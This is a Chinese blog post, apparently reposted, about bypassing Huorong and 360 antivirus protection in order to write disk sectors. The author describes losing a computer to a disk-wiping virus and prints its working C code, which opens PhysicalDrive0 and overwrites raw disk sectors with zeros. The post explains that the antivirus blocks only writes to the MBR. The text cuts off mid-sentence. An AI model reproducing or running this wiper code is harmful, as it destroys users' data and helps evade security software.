admin管理员组文章数量:1586541
前言
由于我自己是一个系统安全爱好者,之前下载了一个能覆写所有扇区的病毒源码,我以为火绒可以保护我的扇区,我就傻乎乎的调试运行了,然后火绒把mbr写入拦截了,我以为没有任何问题了,已重启,哦,Missing Operating System。
在痛失电脑之后,我一直在想病毒是如何做到火绒报警了但是还是写入了扇区?后来我简单分析了源码之后,我看到了这样的一段代码
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpszArgument,int nCmdShow) {
HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
DWORD wb;
unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 512);
SetFilePointer(drive, 0, NULL, FILE_BEGIN);
for(int i = 0;i < 50000;i++){
WriteFile(drive, bootcode, 512, &wb, NULL);
SetFilePointer(drive, 512, NULL, FILE_CURRENT);
}
CloseHandle(drive);
这个病毒从0扇区开始写,写入了前5000扇区,而火绒只会拦截0扇区(也就是MBR)的写入!所以病毒运行之后火绒虽然拦截了MBR写入
版权声明:本文标题:如何利用DLL注入绕过火绒和360主动防御写入扇区? 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1727976758a1140743.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论